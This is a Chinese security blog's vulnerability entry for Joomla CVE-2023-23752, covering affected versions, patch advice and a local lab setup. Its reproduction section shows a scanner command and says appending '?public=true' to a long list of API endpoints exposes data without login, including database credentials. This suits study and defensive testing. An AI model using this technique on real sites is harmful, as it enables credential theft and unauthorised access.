某不知名博客 某不知名博客
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)

Carsaid

安全界的小学生
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)
  • Web应用程序

    • 74cms

    • Alibaba Druid

    • Alibaba Nacos

    • Apache Airflow

    • GoCD

    • Jboss

    • jenkins

    • joomla

      • joomla-cve-2017-8917
      • joomla-cve-2023-23752
      • thinkphp

      • vmware

      • weblogic

    • 云漏洞库

    • 漏洞库
    • Web应用程序
    • joomla
    carsaid
    2023-10-11
    目录

    joomla-cve-2023-23752

    # Joomla未授权访问

    # 1)漏洞信息

    漏洞名称 受影响组件 漏洞类型 漏洞编号
    Joomla未授权访问 Joomla (opens new window) 未授权访问 CVE-2023-23752
    漏洞简介

    变量覆盖导致的越权 -> 未授权访问

    影响版本:

    4.0.0 <= Joomla <= 4.2.7
    参考链接
    1. https://xz.aliyun.com/t/12175
    补丁及修复方案
    升级至最新版本
    1. https://downloads.joomla.org/zh-cn/

    # 漏洞环境

    1. 下载并安装phpstudy:https://www.xp.cn/download.html
    1. 打开phpstudy,启动Apache和MySQL

    2. 访问本地80端口 可以看到phpstudy的页面

    3. 下载Joomla:https://downloads.joomla.org/zh-cn/cms/joomla4/4-2-0/Joomla_4-2-0-Stable-Full_Package.zip?format=zip

    1. 解压Joomla压缩包,放到phpstudy所在目录

    2. 修改文件夹名称

    • Joomla文件夹 -> WWW
    • 原有WWW文件夹 -> WWW2
    1. 访问本地80端口,可以看到Joomla安装页面
    • 输入网站名称(名称随意)
    1. 输入账号密码
    • 密码强制要求12位,否则无法安装
    1. 输入数据库信息
    • phpstudy默认的MySQL账号为:root
    • phpstudy默认的MySQL密码为:root
    1. 点击安装,如果看到Joomla的Logo则说明安装正在进行,稍等一会

    2. 安装完成之后,点击“完成并打开前台”

    3. 如果提示“无法删除installation目录”,则需要手动删除

    4. 删除installation目录之后,再次回到前台,可以看到Joomla页面

    # 漏洞复现

    python vulcat.py -u <URL> -a joomla -v cve-2023-23752
    
    # 注意, vulcat-v2.0.0版本及以上, 应使用以下命令
    python3 vulcat.py -u <URL> -v cve-2023-23752
    
    1
    2
    3
    4

    可以看到Joomla的配置信息

    • 包括数据库的账号密码

    其他受影响的API

    • 只需要添加 ?public=true 即可未授权访问
    v1/banners
    v1/banners/:id
    v1/banners
    v1/banners/:id
    v1/banners/:id
    v1/banners/clients
    v1/banners/clients/:id
    v1/banners/clients
    v1/banners/clients/:id
    v1/banners/clients/:id
    v1/banners/categories
    v1/banners/categories/:id
    v1/banners/categories
    v1/banners/categories/:id
    v1/banners/categories/:id
    v1/banners/:id/contenthistory
    v1/banners/:id/contenthistory/keep
    v1/banners/:id/contenthistory
    v1/config/application
    v1/config/application
    v1/config/:component_name
    v1/config/:component_name
    v1/contacts/form/:id
    v1/contacts
    v1/contacts/:id
    v1/contacts
    v1/contacts/:id
    v1/contacts/:id
    v1/contacts/categories
    v1/contacts/categories/:id
    v1/contacts/categories
    v1/contacts/categories/:id
    v1/contacts/categories/:id
    v1/fields/contacts/contact
    v1/fields/contacts/contact/:id
    v1/fields/contacts/contact
    v1/fields/contacts/contact/:id
    v1/fields/contacts/contact/:id
    v1/fields/contacts/mail
    v1/fields/contacts/mail/:id
    v1/fields/contacts/mail
    v1/fields/contacts/mail/:id
    v1/fields/contacts/mail/:id
    v1/fields/contacts/categories
    v1/fields/contacts/categories/:id
    v1/fields/contacts/categories
    v1/fields/contacts/categories/:id
    v1/fields/contacts/categories/:id
    v1/fields/groups/contacts/contact
    v1/fields/groups/contacts/contact/:id
    v1/fields/groups/contacts/contact
    v1/fields/groups/contacts/contact/:id
    v1/fields/groups/contacts/contact/:id
    v1/fields/groups/contacts/mail
    v1/fields/groups/contacts/mail/:id
    v1/fields/groups/contacts/mail
    v1/fields/groups/contacts/mail/:id
    v1/fields/groups/contacts/mail/:id
    v1/fields/groups/contacts/categories
    v1/fields/groups/contacts/categories/:id
    v1/fields/groups/contacts/categories
    v1/fields/groups/contacts/categories/:id
    v1/fields/groups/contacts/categories/:id
    v1/contacts/:id/contenthistory
    v1/contacts/:id/contenthistory/keep
    v1/contacts/:id/contenthistory
    v1/content/articles
    v1/content/articles/:id
    v1/content/articles
    v1/content/articles/:id
    v1/content/articles/:id
    v1/content/categories
    v1/content/categories/:id
    v1/content/categories
    v1/content/categories/:id
    v1/content/categories/:id
    v1/fields/content/articles
    v1/fields/content/articles/:id
    v1/fields/content/articles
    v1/fields/content/articles/:id
    v1/fields/content/articles/:id
    v1/fields/content/categories
    v1/fields/content/categories/:id
    v1/fields/content/categories
    v1/fields/content/categories/:id
    v1/fields/content/categories/:id
    v1/fields/groups/content/articles
    v1/fields/groups/content/articles/:id
    v1/fields/groups/content/articles
    v1/fields/groups/content/articles/:id
    v1/fields/groups/content/articles/:id
    v1/fields/groups/content/categories
    v1/fields/groups/content/categories/:id
    v1/fields/groups/content/categories
    v1/fields/groups/content/categories/:id
    v1/fields/groups/content/categories/:id
    v1/content/articles/:id/contenthistory
    v1/content/articles/:id/contenthistory/keep
    v1/content/articles/:id/contenthistory
    v1/extensions
    v1/languages/content
    v1/languages/content/:id
    v1/languages/content
    v1/languages/content/:id
    v1/languages/content/:id
    v1/languages/overrides/search
    v1/languages/overrides/search/cache/refresh
    v1/languages/overrides/site/zh-CN
    v1/languages/overrides/site/zh-CN/:id
    v1/languages/overrides/site/zh-CN
    v1/languages/overrides/site/zh-CN/:id
    v1/languages/overrides/site/zh-CN/:id
    v1/languages/overrides/administrator/zh-CN
    v1/languages/overrides/administrator/zh-CN/:id
    v1/languages/overrides/administrator/zh-CN
    v1/languages/overrides/administrator/zh-CN/:id
    v1/languages/overrides/administrator/zh-CN/:id
    v1/languages/overrides/site/en-GB
    v1/languages/overrides/site/en-GB/:id
    v1/languages/overrides/site/en-GB
    v1/languages/overrides/site/en-GB/:id
    v1/languages/overrides/site/en-GB/:id
    v1/languages/overrides/administrator/en-GB
    v1/languages/overrides/administrator/en-GB/:id
    v1/languages/overrides/administrator/en-GB
    v1/languages/overrides/administrator/en-GB/:id
    v1/languages/overrides/administrator/en-GB/:id
    v1/languages
    v1/languages
    v1/media/adapters
    v1/media/adapters/:id
    v1/media/files
    v1/media/files/:path/
    v1/media/files/:path
    v1/media/files
    v1/media/files/:path
    v1/media/files/:path
    v1/menus/site
    v1/menus/site/:id
    v1/menus/site
    v1/menus/site/:id
    v1/menus/site/:id
    v1/menus/administrator
    v1/menus/administrator/:id
    v1/menus/administrator
    v1/menus/administrator/:id
    v1/menus/administrator/:id
    v1/menus/site/items
    v1/menus/site/items/:id
    v1/menus/site/items
    v1/menus/site/items/:id
    v1/menus/site/items/:id
    v1/menus/administrator/items
    v1/menus/administrator/items/:id
    v1/menus/administrator/items
    v1/menus/administrator/items/:id
    v1/menus/administrator/items/:id
    v1/menus/site/items/types
    v1/menus/administrator/items/types
    v1/messages
    v1/messages/:id
    v1/messages
    v1/messages/:id
    v1/messages/:id
    v1/modules/types/site
    v1/modules/types/administrator
    v1/modules/site
    v1/modules/site/:id
    v1/modules/site
    v1/modules/site/:id
    v1/modules/site/:id
    v1/modules/administrator
    v1/modules/administrator/:id
    v1/modules/administrator
    v1/modules/administrator/:id
    v1/modules/administrator/:id
    v1/newsfeeds/feeds
    v1/newsfeeds/feeds/:id
    v1/newsfeeds/feeds
    v1/newsfeeds/feeds/:id
    v1/newsfeeds/feeds/:id
    v1/newsfeeds/categories
    v1/newsfeeds/categories/:id
    v1/newsfeeds/categories
    v1/newsfeeds/categories/:id
    v1/newsfeeds/categories/:id
    v1/plugins
    v1/plugins/:id
    v1/plugins/:id
    v1/privacy/requests
    v1/privacy/requests/:id
    v1/privacy/requests/export/:id
    v1/privacy/requests
    v1/privacy/consents
    v1/privacy/consents/:id
    v1/privacy/consents/:id
    v1/redirects
    v1/redirects/:id
    v1/redirects
    v1/redirects/:id
    v1/redirects/:id
    v1/tags
    v1/tags/:id
    v1/tags
    v1/tags/:id
    v1/tags/:id
    v1/templates/styles/site
    v1/templates/styles/site/:id
    v1/templates/styles/site
    v1/templates/styles/site/:id
    v1/templates/styles/site/:id
    v1/templates/styles/administrator
    v1/templates/styles/administrator/:id
    v1/templates/styles/administrator
    v1/templates/styles/administrator/:id
    v1/templates/styles/administrator/:id
    v1/users
    v1/users/:id
    v1/users
    v1/users/:id
    v1/users/:id
    v1/fields/users
    v1/fields/users/:id
    v1/fields/users
    v1/fields/users/:id
    v1/fields/users/:id
    v1/fields/groups/users
    v1/fields/groups/users/:id
    v1/fields/groups/users
    v1/fields/groups/users/:id
    v1/fields/groups/users/:id
    v1/users/groups
    v1/users/groups/:id
    v1/users/groups
    v1/users/groups/:id
    v1/users/groups/:id
    v1/users/levels
    v1/users/levels/:id
    v1/users/levels
    v1/users/levels/:id
    v1/users/levels/:id
    
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    236
    237
    238
    239
    240
    241
    编辑 (opens new window)
    joomla-cve-2017-8917
    thinkphp-cnvd-2018-24942

    ← joomla-cve-2017-8917 thinkphp-cnvd-2018-24942→

    最近更新
    01
    API测试笔记
    04-30
    02
    msfvenom
    03-29
    03
    Metasploit
    03-29
    更多文章>
    Theme by Vdoing | Copyright © 2023-2024 Carsaid | MIT License
    • 跟随系统
    • 浅色模式
    • 深色模式
    • 阅读模式